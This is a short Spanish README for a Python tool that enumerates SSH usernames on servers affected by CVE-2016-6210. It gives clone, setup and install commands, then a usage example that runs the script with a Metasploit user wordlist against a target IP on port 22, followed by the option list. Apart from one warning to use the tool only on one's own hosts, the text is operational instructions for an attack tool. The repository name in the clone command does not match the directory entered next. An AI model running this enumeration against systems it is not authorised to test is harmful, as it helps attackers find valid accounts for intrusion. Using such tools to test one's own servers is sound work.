
Enumeración de nombres de usuario contra daemons SSH afectados por CVE-2016-6210.
Enumeración de nombres de usuario contra demonios SSH afectados por CVE-2016-6210.
¡Úsalo solo contra tus propios hosts! ¡Atacar cosas que no tienes permitido puede meterte en serios problemas!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
example: 40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
argumentos posicionales: host Da la dirección del servidor SSH como ip:puerto o solo la ip
opciones: -h, --help muestra este mensaje de ayuda y sale -u, --user USER Especifica un único nombre de usuario -U, --userlist USERLIST Proporciona un archivo con una lista de usuarios -e, --enumerated Muestra solo los usuarios enumerados -s, --silent Modo silencioso --bytes BYTES Bytes que se enviarán como contraseña --samples SAMPLES Muestras para el tiempo de referencia --factor FACTOR Factor para el límite de tiempo --trials TRIALS Intentos por usuario